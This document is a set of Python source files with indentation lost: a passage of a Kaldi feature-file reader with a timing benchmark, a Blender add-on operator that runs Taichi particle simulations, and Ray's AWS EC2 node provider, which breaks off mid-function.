fd.write(struct.pack(np.dtype('uint32').char, m.shape[0])) # rows
fd.write('\04'.encode())
fd.write(struct.pack(np.dtype('uint32').char, m.shape[1])) # cols
# Data,
fd.write(m.tobytes())
finally:
if fd is not file_or_fd : fd.close()
#################################################
# 'Posterior' kaldi type (posteriors, confusion network, nnet1 training targets, ...)
# Corresponds to: vector<vector<tuple<int,float> > >
# - outer vector: time axis
# - inner vector: records at the time
# - tuple: int = index, float = value
#
def read_cnet_ark(file_or_fd):
""" Alias of function 'read_post_ark()', 'cnet' = confusion network """
return read_post_ark(file_or_fd)
def read_post_ark(file_or_fd):
""" generator(key,vec<vec<int,float>>) = read_post_ark(file)
Returns generator of (key,posterior) tuples, read from ark file.
file_or_fd : ark, gzipped ark, pipe or opened file descriptor.
Iterate the ark:
for key,post in kaldi_io.read_post_ark(file):
...
Read ark to a 'dictionary':
d = { key:post for key,post in kaldi_io.read_post_ark(file) }
"""
fd = open_or_fd(file_or_fd)
try:
key = read_key(fd)
while key:
post = read_post(fd)
yield key, post
key = read_key(fd)
finally:
if fd is not file_or_fd: fd.close()
def read_post(file_or_fd):
""" [post] = read_post(file_or_fd)
Reads single kaldi 'Posterior' in binary format.
The 'Posterior' is C++ type 'vector<vector<tuple<int,float> > >',
the outer-vector is usually time axis, inner-vector are the records
at given time, and the tuple is composed of an 'index' (integer)
and a 'float-value'. The 'float-value' can represent a probability
or any other numeric value.
Returns vector of vectors of tuples.
"""
fd = open_or_fd(file_or_fd)
ans=[]
binary = fd.read(2).decode(); assert(binary == '\0B'); # binary flag
assert(fd.read(1).decode() == '\4'); # int-size
outer_vec_size = np.frombuffer(fd.read(4), dtype='int32', count=1)[0] # number of frames (or bins)
# Loop over 'outer-vector',
for i in range(outer_vec_size):
assert(fd.read(1).decode() == '\4'); # int-size
inner_vec_size = np.frombuffer(fd.read(4), dtype='int32', count=1)[0] # number of records for frame (or bin)
data = np.frombuffer(fd.read(inner_vec_size*10), dtype=[('size_idx','int8'),('idx','int32'),('size_post','int8'),('post','float32')], count=inner_vec_size)
assert(data[0]['size_idx'] == 4)
assert(data[0]['size_post'] == 4)
ans.append(data[['idx','post']].tolist())
if fd is not file_or_fd: fd.close()
return ans
#################################################
# Kaldi Confusion Network bin begin/end times,
# (kaldi stores CNs time info separately from the Posterior).
#
def read_cntime_ark(file_or_fd):
""" generator(key,vec<tuple<float,float>>) = read_cntime_ark(file_or_fd)
Returns generator of (key,cntime) tuples, read from ark file.
file_or_fd : file, gzipped file, pipe or opened file descriptor.
Iterate the ark:
for key,time in kaldi_io.read_cntime_ark(file):
...
Read ark to a 'dictionary':
d = { key:time for key,time in kaldi_io.read_post_ark(file) }
"""
fd = open_or_fd(file_or_fd)
try:
key = read_key(fd)
while key:
cntime = read_cntime(fd)
yield key, cntime
key = read_key(fd)
finally:
if fd is not file_or_fd : fd.close()
def read_cntime(file_or_fd):
""" [cntime] = read_cntime(file_or_fd)
Reads single kaldi 'Confusion Network time info', in binary format:
C++ type: vector<tuple<float,float> >.
(begin/end times of bins at the confusion network).
Binary layout is '<num-bins> <beg1> <end1> <beg2> <end2> ...'
file_or_fd : file, gzipped file, pipe or opened file descriptor.
Returns vector of tuples.
"""
fd = open_or_fd(file_or_fd)
binary = fd.read(2).decode(); assert(binary == '\0B'); # assuming it's binary
assert(fd.read(1).decode() == '\4'); # int-size
vec_size = np.frombuffer(fd.read(4), dtype='int32', count=1)[0] # number of frames (or bins)
data = np.frombuffer(fd.read(vec_size*10), dtype=[('size_beg','int8'),('t_beg','float32'),('size_end','int8'),('t_end','float32')], count=vec_size)
assert(data[0]['size_beg'] == 4)
assert(data[0]['size_end'] == 4)
ans = data[['t_beg','t_end']].tolist() # Return vector of tuples (t_beg,t_end),
if fd is not file_or_fd : fd.close()
return ans
#################################################
# Segments related,
#
# Segments as 'Bool vectors' can be handy,
# - for 'superposing' the segmentations,
# - for frame-selection in Speaker-ID experiments,
def read_segments_as_bool_vec(segments_file):
""" [ bool_vec ] = read_segments_as_bool_vec(segments_file)
using kaldi 'segments' file for 1 wav, format : '<utt> <rec> <t-beg> <t-end>'
- t-beg, t-end is in seconds,
- assumed 100 frames/second,
"""
segs = np.loadtxt(segments_file, dtype='object,object,f,f', ndmin=1)
# Sanity checks,
assert(len(segs) > 0) # empty segmentation is an error,
assert(len(np.unique([rec[1] for rec in segs ])) == 1) # segments with only 1 wav-file,
# Convert time to frame-indexes,
start = np.rint([100 * rec[2] for rec in segs]).astype(int)
end = np.rint([100 * rec[3] for rec in segs]).astype(int)
# Taken from 'read_lab_to_bool_vec', htk.py,
frms = np.repeat(np.r_[np.tile([False,True], len(end)), False],
np.r_[np.c_[start - np.r_[0, end[:-1]], end-start].flat, 0])
assert np.sum(end-start) == np.sum(frms)
return frms
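# Example (illustrative): a segments file containing the two lines
#   utt1 rec1 0.00 0.05
#   utt2 rec1 0.10 0.12
# yields, at 100 frames/second, a 12-element bool vector with frames 0-4 and
# 10-11 set to True and the frames in between set to False.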
if __name__ == "__main__":
def read(file_or_fd, length=None, shuffle=False):
""" [mat] = read_mat(file_or_fd)
Reads single kaldi matrix, supports ascii and binary.
file_or_fd : file, gzipped file, pipe or opened file descriptor.
In our case, file_or_fd can only be a filename with offset. We will save the fd after opening it.
"""
(filename, offset) = file_or_fd.rsplit(":", 1)
fd = open(filename, 'rb')
fd.seek(int(offset))
binary = fd.read(2).decode()
if binary == '\0B':
mat, time1, time2, time3 = read_mat_binary(fd)
else:
raise UnknownMatrixHeader("Expected binary matrix data, got '%s'" % binary)
if length is not None:
num_features = mat.shape[0]
length = num_features if length > num_features else length
start = random.randint(0, num_features - length) if shuffle else 0
mat = mat[start:start+length, :]
fd.close()
return mat, time1, time2, time3
def read_mat_binary(fd):
# Data type
import time
ts = time.time()
header = fd.read(3).decode()
# 'CM', 'CM2', 'CM3' are possible values,
if header.startswith('CM'):
return read_compressed_mat(fd, header)
elif header == 'FM ':
sample_size = 4 # floats
elif header == 'DM ':
sample_size = 8 # doubles
else:
raise UnknownMatrixHeader("The header contained '%s'" % header)
assert (sample_size > 0)
# Dimensions
s1, rows, s2, cols = np.frombuffer(fd.read(10), dtype='int8,int32,int8,int32', count=1)[0]
t1 = time.time() - ts
# Read whole matrix
ts = time.time()
buf = fd.read(rows * cols * sample_size)
t2 = time.time() - ts
ts = time.time()
if sample_size == 4:
vec = np.frombuffer(buf, dtype='float32')
elif sample_size == 8:
vec = np.frombuffer(buf, dtype='float64')
else:
raise BadSampleSize
mat = np.reshape(vec, (rows, cols))
t3 = time.time() - ts
return mat, t1, t2, t3
def read_compressed_mat(fd, format):
""" Read a compressed matrix,
see: https://github.com/kaldi-asr/kaldi/blob/master/src/matrix/compressed-matrix.h
methods: CompressedMatrix::Read(...), CompressedMatrix::CopyToMat(...),
"""
assert (format == 'CM ') # The formats CM2, CM3 are not supported...
# Format of header 'struct',
global_header = np.dtype([('minvalue', 'float32'), ('range', 'float32'), ('num_rows', 'int32'),
('num_cols', 'int32')]) # member '.format' is not written,
per_col_header = np.dtype([('percentile_0', 'uint16'), ('percentile_25', 'uint16'), ('percentile_75', 'uint16'),
('percentile_100', 'uint16')])
# Mapping for percentiles in col-headers,
def uint16_to_float(value, min, range):
return np.float32(min + range * 1.52590218966964e-05 * value)
# Mapping for matrix elements,
def uint8_to_float_v2(vec, p0, p25, p75, p100):
# Split the vector by masks,
mask_0_64 = (vec <= 64)
mask_65_192 = np.all([vec > 64, vec <= 192], axis=0)
mask_193_255 = (vec > 192)
# Sanity check (useful but slow...),
# assert(len(vec) == np.sum(np.hstack([mask_0_64,mask_65_192,mask_193_255])))
# assert(len(vec) == np.sum(np.any([mask_0_64,mask_65_192,mask_193_255], axis=0)))
# Build the float vector,
ans = np.empty(len(vec), dtype='float32')
ans[mask_0_64] = p0 + (p25 - p0) / 64. * vec[mask_0_64]
ans[mask_65_192] = p25 + (p75 - p25) / 128. * (vec[mask_65_192] - 64)
ans[mask_193_255] = p75 + (p100 - p75) / 63. * (vec[mask_193_255] - 192)
return ans
import time
ts = time.time()
# Read global header,
globmin, globrange, rows, cols = np.frombuffer(fd.read(16), dtype=global_header, count=1)[0]
t1 = time.time() - ts
# The data is structured as [Colheader, ... , Colheader, Data, Data , .... ]
# { cols }{ size }
ts = time.time()
col_headers = np.frombuffer(fd.read(cols * 8), dtype=per_col_header, count=cols)
data = np.reshape(np.frombuffer(fd.read(cols * rows), dtype='uint8', count=cols * rows),
newshape=(cols, rows)) # stored as col-major,
t2 = time.time() - ts
ts = time.time()
mat = np.empty((cols, rows), dtype='float32')
for i, col_header in enumerate(col_headers):
col_header_flt = [uint16_to_float(percentile, globmin, globrange) for percentile in col_header]
mat[i] = uint8_to_float_v2(data[i], *col_header_flt)
t3 = time.time() - ts
return mat.T, t1, t2, t3 # transpose! col-major -> row-major,
# data = "/home/dawna/mgb3/transcription/exp-yl695/Snst/xvector/cpdaic_1.0_50/data/voxceleb_train_combined_no_sil"
data = "/scratch/yl695/voxceleb/data/voxceleb_train_combined_no_sil"
feats_scp = []
with open(os.path.join(data, "feats.scp"), "r") as f:
for line in f.readlines():
utt, scp = line.strip().split(" ")
feats_scp.append(scp)
import random
import time
ts = time.time()
time1 = 0
time2 = 0
time3 = 0
for _ in range(2):
num_samples = 640
batch_length = random.randint(200, 400)
selected = random.sample(feats_scp, num_samples)
for utt in selected:
_, t1, t2, t3 = read(utt, batch_length, shuffle=True)
time1 += t1
time2 += t2
time3 += t3
te = time.time() - ts
print("Total time: %f s, time 1: %f s, time 2: %f s, time 3: %f s" % (te, time1, time2, time3))
|
operators.py
|
# standard modules
import threading
import struct
import os
# blender modules
import bpy
import bmesh
# addon modules
import taichi as ti
import numpy as np
from .engine import mpm_solver
from . import types
from . import particles_io
from . import nodes
WARN_SIM_NODE = 'Node tree must not contain more than 1 "Simulation" node.'
WARN_NOT_SIM_NODE = 'Node tree does not have "Simulation" node.'
mpm_solver.USE_IN_BLENDER = True
IMPORT_NODES = (
'elements_particles_mesh_node',
'elements_particles_system_node'
)
# sim_node - simulation node
def get_cache_folder(operator, sim_node):
# particles socket
par_s = sim_node.outputs['Simulation Data']
cache_nodes = []
has_cache_node = False
if par_s.is_linked:
for link in par_s.links:
# disk cache node
disk = link.to_node
if disk.bl_idname == nodes.ElementsCacheNode.bl_idname:
cache_nodes.append(disk)
if not len(cache_nodes):
operator.is_finishing = True
operator.report(
{'WARNING'},
'Node tree does not have "Cache" node.'
)
return None, has_cache_node
elif len(cache_nodes) > 1:
operator.is_finishing = True
operator.report(
{'WARNING'},
'Node tree must not contain more than 1 "Cache" node.'
)
return None, has_cache_node
else:
cache_node = cache_nodes[0]
has_cache_node = True
folder_raw = cache_node.inputs['Folder'].get_value()[0]
folder = bpy.path.abspath(folder_raw)
return folder, has_cache_node
# get simulation nodes tree object
def get_tree_obj(node_tree):
# simulation nodes tree object
tree = types.Tree()
for node in node_tree.nodes:
if node.bl_idname == 'elements_simulation_node':
tree.sim_nds[node.name] = node
elif node.bl_idname in IMPORT_NODES:
if node.bl_idname == 'elements_particles_system_node':
import_type = 'PAR_SYS'
elif node.bl_idname == 'elements_particles_mesh_node':
import_type = 'PAR_MESH'
node.get_class()
tree.imp_nds[node.name] = node, import_type
elif node.bl_idname == 'elements_cache_node':
tree.cache_nds[node.name] = node
return tree
def create_emitter(operator, solv, emitter, vel):
# source object
src_obj = emitter.source_object
if not src_obj:
operator.is_finishing = True
operator.report(
{'WARNING'},
'Emitter does not have a source object.'
)
return
obj_name = src_obj.obj_name
obj = bpy.data.objects.get(obj_name)
if not obj:
operator.is_finishing = True
if not obj_name:
operator.report(
{'WARNING'},
'Emitter source object is not specified.'
)
else:
operator.report(
{'WARNING'},
'Cannot find emitter source object: "{}".'.format(obj_name)
)
return
if obj.type != 'MESH':
operator.is_finishing = True
operator.report(
{'WARNING'},
'Emitter source object is not a mesh: "{}".'.format(obj.name)
)
return
if not emitter.material:
operator.is_finishing = True
operator.report(
{'WARNING'},
'Emitter does not have a material.'
)
return
if not len(obj.data.polygons):
operator.is_finishing = True
operator.report(
{'WARNING'},
'Emitter source object does not have polygons: "{}".'.format(obj.name)
)
return
b_mesh = bmesh.new()
b_mesh.from_mesh(obj.data)
bmesh.ops.triangulate(b_mesh, faces=b_mesh.faces)
# emitter triangles
tris = []
for face in b_mesh.faces:
# triangle
tri = []
# v - bmesh vertex
for v in face.verts:
# final vertex coordinate
v_co = obj.matrix_world @ v.co
tri.extend(v_co)
tris.append(tri)
b_mesh.clear()
tris = np.array(tris, dtype=np.float32)
# material type
mat = emitter.material.typ
# taichi material
ti_mat = mpm_solver.MPMSolver.materials.get(mat, None)
if ti_mat is None:
assert False, mat
# emitter particles color
red = int(emitter.color[0].r * 255) << 16
green = int(emitter.color[0].g * 255) << 8
blue = int(emitter.color[0].b * 255)
color = red | green | blue
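# e.g. an emitter color of (1.0, 0.5, 0.0) packs to 0xFF7F00 (illustrative)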
# add emitter
solv.add_mesh(
triangles=tris,
material=ti_mat,
color=color,
velocity=vel,
emmiter_id=operator.emitter_indices[emitter]
)
return True
class ELEMENTS_OT_SimulateParticles(bpy.types.Operator):
bl_idname = "elements.simulate_particles"
bl_label = "Simulate"
device: bpy.props.EnumProperty(
name='Device',
default='cpu',
items=(
('gpu', 'GPU', 'Run on GPU, automatically detect backend'),
('cuda', 'CUDA', 'Run on GPU, with the NVIDIA CUDA backend'),
('opengl', 'OpenGL', 'Run on GPU, with the OpenGL backend'),
('metal', 'Metal', 'Run on GPU, with the Apple Metal backend, if you are on macOS'),
('cpu', 'CPU', 'Run on CPU (default)')
)
)
device_memory_fraction: bpy.props.FloatProperty(
name='Device Memory',
default=50.0,
min=10.0,
max=100.0,
subtype='PERCENTAGE'
)
def __init__(self):
self.timer = None
self.thread = None
self.is_running = False
self.is_finishing = False
self.event_type = 'DEFAULT'
def create_emitters(self, frame):
for emitter in self.emitters:
if len(emitter.velocity) == 1:
vel = emitter.velocity[0]
else:
vel = emitter.velocity[frame]
if emitter.typ == 'EMITTER':
if emitter.emit_frame[0] == frame:
correct_emitter = create_emitter(self, self.solv, emitter, vel)
if not correct_emitter:
return self.cancel(bpy.context)
elif emitter.typ == 'INFLOW':
if isinstance(emitter.enable, float):
enable = emitter.enable
else:
if len(emitter.enable) == 1:
index = 0
else:
index = frame
enable = bool(int(round(emitter.enable[index], 0)))
if enable:
correct_emitter = create_emitter(self, self.solv, emitter, vel)
if not correct_emitter:
return self.cancel(bpy.context)
return True
def save_particles(self, frame, np_x, np_v, np_color, np_material, np_emitters):
if not os.path.exists(self.cache_folder):
os.makedirs(self.cache_folder)
# file name
fname = 'particles_{0:0>6}'.format(frame)
# particle file path
pars_fpath = os.path.join(self.cache_folder, fname)
# particles data
par_data = {
particles_io.POS: np_x,
particles_io.VEL: np_v,
particles_io.COL: np_color,
particles_io.MAT: np_material,
particles_io.EMT: np_emitters,
}
data = particles_io.write_pars_v1(par_data, pars_fpath, fname)
with open(pars_fpath + '.bin', 'wb') as file:
file.write(data)
write_obj = False
if write_obj:
with open(pars_fpath + '.obj', 'w') as f:
for i in range(np_x.shape[0]):
x = np_x[i]
print(f'v {x[0]} {x[1]} {x[2]}', file=f)
def run_sim(self):
# self.frame_end + 1 so that the last frame is included in the range
for frame in range(self.frame_start, self.frame_end + 1, 1):
if self.event_type == 'ESC':
print('STOP SIMULATION')
self.thread = None
self.is_finishing = True
self.cancel(bpy.context)
return
print('Frame: {}'.format(frame))
is_correct = self.create_emitters(frame)
if is_correct is not True:
return self.cancel(bpy.context)
# generate simulation state at t = 0
# particles
pars = self.solv.particle_info()
np_x = pars['position']
np_v = pars['velocity']
np_material = pars['material']
np_color = pars['color']
np_emitters = pars['emitter_ids']
# and then start time stepping
self.solv.step(1 / self.fps)
print(np_x)
self.save_particles(
frame,
np_x,
np_v,
np_color,
np_material,
np_emitters
)
def init_sim(self):
# simulation nodes
sim = []
for node in self.node_tree.nodes:
if node.bl_idname == 'elements_simulation_node':
sim.append(node)
if not len(sim):
self.report({'WARNING'}, WARN_NOT_SIM_NODE)
self.is_finishing = True
return self.cancel(bpy.context)
elif len(sim) > 1:
self.report({'WARNING'}, WARN_SIM_NODE)
self.is_finishing = True
return self.cancel(bpy.context)
else:
inputs = sim[0].inputs
self.scene.elements_frame_start = inputs['Frame Start'].get_value()[0]
self.scene.elements_frame_end = inputs['Frame End'].get_value()[0]
self.is_running = True
self.scene.elements_nodes.clear()
tree = get_tree_obj(self.node_tree)
# simulation nodes count
sim_nodes_cnt = len(tree.sim_nds)
if sim_nodes_cnt != 1:
if sim_nodes_cnt > 1:
self.report({'WARNING'}, WARN_SIM_NODE)
self.is_finishing = True
return
sim = list(tree.sim_nds.values())[0]
if not sim:
return self.cancel(bpy.context)
sim.get_class()
# simulation class
cls, _ = self.scene.elements_nodes[sim.name]
self.cache_folder, has_cache_node = get_cache_folder(self, sim)
if not has_cache_node:
return self.cancel(bpy.context)
if not self.cache_folder and has_cache_node:
self.report({'WARNING'}, 'Cache folder not specified')
self.is_finishing = True
return self.cancel(bpy.context)
self.frame_start = cls.frame_start[0]
self.frame_end = cls.frame_end[0]
self.fps = cls.fps[0]
# TODO: list is not implemented
if not cls.solver:
self.report(
{'WARNING'},
'Node tree does not have "MPM Solver" node.'
)
self.is_finishing = True
return {'FINISHED'}
res = cls.solver.resolution[0]
size = cls.solver.size[0]
ti.reset()
arch = getattr(ti, self.device)
mem = self.device_memory_fraction / 100
ti.init(arch=arch, device_memory_fraction=mem)
print(f"Creating simulation of res {res}, size {size}")
solv = mpm_solver.MPMSolver(
(res, res, res),
size=size,
unbounded=True,
use_emitter_id=True
)
solv.set_gravity(tuple(cls.gravity[0]))
self.emitters = cls.emitters
if not self.emitters:
self.report({'WARNING'}, 'Node tree does not have emitters.')
self.is_finishing = True
return self.cancel(bpy.context)
self.emitter_indices = {}
for index, emitter in enumerate(self.emitters):
self.emitter_indices[emitter] = index
if cls.colliders:
for collider in cls.colliders:
direct = collider.direction[0]
if not direct[0] and not direct[1] and not direct[2]:
direct = (0, 0, 1)
frict = collider.friction[0]
if frict < 0:
frict = 0
elif frict > 1:
frict = 1
solv.add_surface_collider(
tuple(collider.position[0]),
tuple(direct),
surface=collider.surface,
friction=frict
)
self.size = size
self.solv = solv
self.run_sim()
def launch_sim(self):
self.thread = threading.Thread(target=self.init_sim, args=())
self.thread.start()
def modal(self, context, event):
if event.type == 'ESC':
self.event_type = 'ESC'
if not self.is_running:
self.launch_sim()
if self.is_finishing:
self.cancel(context)
return {'FINISHED'}
return {'PASS_THROUGH'}
def execute(self, context):
self.node_tree = context.space_data.node_tree
self.scene = context.scene
context.window_manager.modal_handler_add(self)
win = context.window
self.timer = context.window_manager.event_timer_add(1.0, window=win)
return {'RUNNING_MODAL'}
def cancel(self, context):
if self.timer:
context.window_manager.event_timer_remove(self.timer)
self.timer = None
self.thread = None
self.is_finishing = True
def invoke(self, context, event):
wm = context.window_manager
return wm.invoke_props_dialog(self)
# operators draw function
def op_draw_func(self, context):
if context.space_data.node_tree:
if context.space_data.node_tree.bl_idname == 'elements_node_tree':
self.layout.operator('elements.simulate_particles')
self.layout.operator('elements.stable_render_animation')
class ELEMENTS_OT_StableRenderAnimation(bpy.types.Operator):
bl_idname = 'elements.stable_render_animation'
bl_label = 'Render'
bl_description = 'Stable Render Animation'
@classmethod
def poll(cls, context):
# space data
spc_data = context.space_data
if spc_data.node_tree:
return spc_data.node_tree.bl_idname == 'elements_node_tree'
def execute(self, context):
scn = context.scene
rend = scn.render
rend.image_settings.file_format = 'PNG'
# output folder
out = rend.filepath
for frm in range(scn.frame_start, scn.frame_end + 1):
file_name = '{0:0>4}.png'.format(frm)
file_path = os.path.join(bpy.path.abspath(out), file_name)
if rend.use_overwrite or not os.path.exists(file_path):
print('Render Frame:', frm)
scn.frame_set(frm)
bpy.ops.render.render(animation=False)
for image in bpy.data.images:
if image.type == 'RENDER_RESULT':
image.save_render(file_path, scene=scn)
bpy.data.images.remove(image)
return {'FINISHED'}
operator_classes = [
ELEMENTS_OT_SimulateParticles,
ELEMENTS_OT_StableRenderAnimation
]
def register():
for operator_class in operator_classes:
bpy.utils.register_class(operator_class)
def unregister():
for operator_class in reversed(operator_classes):
bpy.utils.unregister_class(operator_class)
|
node_provider.py
|
import random
import copy
import threading
from collections import defaultdict
import logging
import boto3
import botocore
from botocore.config import Config
from ray.autoscaler.node_provider import NodeProvider
from ray.autoscaler.aws.config import bootstrap_aws
from ray.autoscaler.tags import TAG_RAY_CLUSTER_NAME, TAG_RAY_NODE_NAME, \
TAG_RAY_LAUNCH_CONFIG, TAG_RAY_NODE_TYPE, TAG_RAY_INSTANCE_TYPE
from ray.ray_constants import BOTO_MAX_RETRIES, BOTO_CREATE_MAX_RETRIES
from ray.autoscaler.log_timer import LogTimer
logger = logging.getLogger(__name__)
def to_aws_format(tags):
"""Convert the Ray node name tag to the AWS-specific 'Name' tag."""
if TAG_RAY_NODE_NAME in tags:
tags["Name"] = tags[TAG_RAY_NODE_NAME]
del tags[TAG_RAY_NODE_NAME]
return tags
def from_aws_format(tags):
"""Convert the AWS-specific 'Name' tag to the Ray node name tag."""
if "Name" in tags:
tags[TAG_RAY_NODE_NAME] = tags["Name"]
del tags["Name"]
return tags
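# Example (illustrative): to_aws_format({TAG_RAY_NODE_NAME: "ray-node-1"})
# returns {"Name": "ray-node-1"}, and from_aws_format inverts it. Note that
# both helpers mutate and return the same dict that was passed in.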
def make_ec2_client(region, max_retries, aws_credentials=None):
"""Make client, retrying requests up to `max_retries`."""
config = Config(retries={"max_attempts": max_retries})
aws_credentials = aws_credentials or {}
return boto3.resource(
"ec2", region_name=region, config=config, **aws_credentials)
class AWSNodeProvider(NodeProvider):
def __init__(self, provider_config, cluster_name):
NodeProvider.__init__(self, provider_config, cluster_name)
self.cache_stopped_nodes = provider_config.get("cache_stopped_nodes",
True)
aws_credentials = provider_config.get("aws_credentials")
self.ec2 = make_ec2_client(
region=provider_config["region"],
max_retries=BOTO_MAX_RETRIES,
aws_credentials=aws_credentials)
self.ec2_fail_fast = make_ec2_client(
region=provider_config["region"],
max_retries=0,
aws_credentials=aws_credentials)
# Try availability zones round-robin, starting from random offset
self.subnet_idx = random.randint(0, 100)
self.tag_cache = {} # Tags that we believe to actually be on EC2.
self.tag_cache_pending = {} # Tags that we will soon upload.
self.tag_cache_lock = threading.Lock()
self.tag_cache_update_event = threading.Event()
self.tag_cache_kill_event = threading.Event()
self.tag_update_thread = threading.Thread(
target=self._node_tag_update_loop)
self.tag_update_thread.start()
# Cache of node objects from the last nodes() call. This avoids
# excessive DescribeInstances requests.
self.cached_nodes = {}
def _node_tag_update_loop(self):
"""Update the AWS tags for a cluster periodically.
The purpose of this loop is to avoid excessive EC2 calls when a large
number of nodes are being launched simultaneously.
"""
while True:
self.tag_cache_update_event.wait()
self.tag_cache_update_event.clear()
batch_updates = defaultdict(list)
with self.tag_cache_lock:
for node_id, tags in self.tag_cache_pending.items():
for x in tags.items():
batch_updates[x].append(node_id)
self.tag_cache[node_id].update(tags)
self.tag_cache_pending = {}
for (k, v), node_ids in batch_updates.items():
m = "Set tag {}={} on {}".format(k, v, node_ids)
with LogTimer("AWSNodeProvider: {}".format(m)):
if k == TAG_RAY_NODE_NAME:
k = "Name"
self.ec2.meta.client.create_tags(
Resources=node_ids,
Tags=[{
"Key": k,
"Value": v
}],
)
self.tag_cache_kill_event.wait(timeout=5)
if self.tag_cache_kill_event.is_set():
return
def non_terminated_nodes(self, tag_filters):
# Note that these filters are acceptable because they are set on
# node initialization, and so can never be sitting in the cache.
tag_filters = to_aws_format(tag_filters)
filters = [
{
"Name": "instance-state-name",
"Values": ["pending", "running"],
},
{
"Name": "tag:{}".format(TAG_RAY_CLUSTER_NAME),
"Values": [self.cluster_name],
},
]
for k, v in tag_filters.items():
filters.append({
"Name": "tag:{}".format(k),
"Values": [v],
})
nodes = list(self.ec2.instances.filter(Filters=filters))
# Populate the tag cache with initial information if necessary
for node in nodes:
if node.id in self.tag_cache:
continue
self.tag_cache[node.id] = from_aws_format(
{x["Key"]: x["Value"]
for x in node.tags})
self.cached_nodes = {node.id: node for node in nodes}
return [node.id for node in nodes]
def is_running(self, node_id):
node = self._get_cached_node(node_id)
return node.state["Name"] == "running"
def is_terminated(self, node_id):
node = self._get_cached_node(node_id)
state = node.state["Name"]
return state not in ["running", "pending"]
def node_tags(self, node_id):
with self.tag_cache_lock:
d1 = self.tag_cache[node_id]
d2 = self.tag_cache_pending.get(node_id, {})
return dict(d1, **d2)
def external_ip(self, node_id):
node = self._get_cached_node(node_id)
if node.public_ip_address is None:
node = self._get_node(node_id)
return node.public_ip_address
def internal_ip(self, node_id):
node = self._get_cached_node(node_id)
if node.private_ip_address is None:
node = self._get_node(node_id)
return node.private_ip_address
def set_node_tags(self, node_id, tags):
with self.tag_cache_lock:
try:
self.tag_cache_pending[node_id].update(tags)
except KeyError:
self.tag_cache_pending[node_id] = tags
self.tag_cache_update_event.set()
def create_node_of_type(self, node_config, tags, instance_type, count):
assert instance_type is not None
node_config["InstanceType"] = instance_type
return self.create_node(node_config, tags, count)
def get_instance_type(self, node_config):
return node_config["InstanceType"]
def create_node(self, node_config, tags, count):
# Always add the instance type tag, since node reuse is unsafe
# otherwise.
tags = copy.deepcopy(tags)
tags[TAG_RAY_INSTANCE_TYPE] = node_config["InstanceType"]
# Try to reuse previously stopped nodes with compatible configs
if self.cache_stopped_nodes:
filters = [
{
"Name": "instance-state-name",
"Values": ["stopped", "stopping"],
},
{
"Name": "tag:{}".format(TAG_RAY_CLUSTER_NAME),
"Values": [self.cluster_name],
},
{
"Name": "tag:{}".format(TAG_RAY_NODE_TYPE),
"Values": [tags[TAG_RAY_NODE_TYPE]],
},
{
"Name": "tag:{}".format(TAG_RAY_INSTANCE_TYPE),
"Values": [tags[TAG_RAY_INSTANCE_TYPE]],
},
{
"Name": "tag:{}".format(TAG_RAY_LAUNCH_CONFIG),
"Values": [tags[TAG_RAY_LAUNCH_CONFIG]],
},
]
reuse_nodes = list(
self.ec2.instances.filter(Filters=filters))[:count]
reuse_node_ids = [n.id for n in reuse_nodes]
if reuse_nodes:
logger.info("AWSNodeProvider: reusing instances {}. "
"To disable reuse, set "
"'cache_stopped_nodes: False' in the provider "
"config.".format(reuse_node_ids))
for node in reuse_nodes:
self.tag_cache[node.id] = from_aws_format(
{x["Key"]: x["Value"]
for x in node.tags})
if node.state["Name"] == "stopping":
logger.info("AWSNodeProvider: waiting for instance "
"{} to fully stop...".format(node.id))
node.wait_until_stopped()
self.ec2.meta.client.start_instances(
InstanceIds=reuse_node_ids)
for node_id in reuse_node_ids:
self.set_node_tags(node_id, tags)
count -= len(reuse_node_ids)
if count:
self._create_node(node_config, tags, count)
def _create_node(self, node_config, tags, count):
tags = to_aws_format(tags)
conf = node_config.copy()
# Delete unsupported keys from the node config
try:
del conf["Resources"]
except KeyError:
pass
tag_pairs = [{
"Key": TAG_RAY_CLUSTER_NAME,
"Value": self.cluster_name,
}]
for k, v in tags.items():
tag_pairs.append({
"Key": k,
"Value": v,
})
tag_specs = [{
"ResourceType": "instance",
"Tags": tag_pairs,
}]
user_tag_specs = conf.get("TagSpecifications", [])
# Allow users to add tags and override values of existing
# tags with their own. This only applies to the resource type
# "instance". All other resource types are appended to the list of
# tag specs.
for user_tag_spec in user_tag_specs:
if user_tag_spec["ResourceType"] == "instance":
for user_tag in user_tag_spec["Tags"]:
exists = False
for tag in tag_specs[0]["Tags"]:
if user_tag["Key"] == tag["Key"]:
exists = True
tag["Value"] = user_tag["Value"]
break
if not exists:
tag_specs[0]["Tags"] += [user_tag]
else:
tag_specs += [user_tag_spec]
# SubnetIds is not a real config key: we must resolve to a
# single SubnetId before invoking the AWS API.
subnet_ids = conf.pop("SubnetIds")
for attempt in range(1, BOTO_CREATE_MAX_RETRIES + 1):
try:
subnet_id = subnet_ids[self.subnet_idx % len(subnet_ids)]
logger.info("NodeProvider: calling create_instances "
"with {} (count={}).".format(subnet_id, count))
self.subnet_idx += 1
conf.update({
"MinCount": 1,
"MaxCount": count,
"SubnetId": subnet_id,
"TagSpecifications": tag_specs
})
created = self.ec2_fail_fast.create_instances(**conf)
for instance in created:
logger.info("NodeProvider: Created instance "
"[id={}, name={}, info={}]".format(
instance.instance_id,
instance.state["Name"],
instance.state_reason["Message"]))
break
except botocore.exceptions.ClientError as exc:
if attempt == BOTO_CREATE_MAX_RETRIES:
logger.error(
"create_instances: Max attempts ({}) exceeded.".format(
BOTO_CREATE_MAX_RETRIES))
raise exc
else:
logger.error(exc)
def terminate_node(self, node_id):
node = self._get_cached_node(node_id)
if self.cache_stopped_nodes:
if node.spot_instance_request_id:
logger.info(
"AWSNodeProvider: terminating node {} (spot nodes cannot "
"be stopped, only terminated)".format(node_id))
node.terminate()
else:
logger.info(
"AWSNodeProvider: stopping node {}. To terminate nodes "
"on stop, set 'cache_stopped_nodes: False' in the "
"provider config.".format(node_id))
node.stop()
else:
node.terminate()
self.tag_cache.pop(node_id, None)
self.tag_cache_pending.pop(node_id, None)
def terminate_nodes(self, node_ids):
if not node_ids:
return
if self.cache_stopped_nodes:
spot_ids = []
on_demand_ids = []
for node_id in node_ids:
if self._get_cached_node(node_id).spot_instance_request_id:
spot_ids += [node_id]
else:
on_demand_ids += [node_id]
if on_demand_ids:
logger.info(
"AWSNodeProvider: stopping nodes {}. To terminate nodes "
"on stop, set 'cache_stopped_nodes: False' in the "
"provider config.".format(on_demand_ids))
self.ec2.meta.client.stop_instances(InstanceIds=on_demand_ids)
if spot_ids:
logger.info(
"AWSNodeProvider: terminating nodes {} (spot nodes cannot "
"be stopped, only terminated)".format(spot_ids))
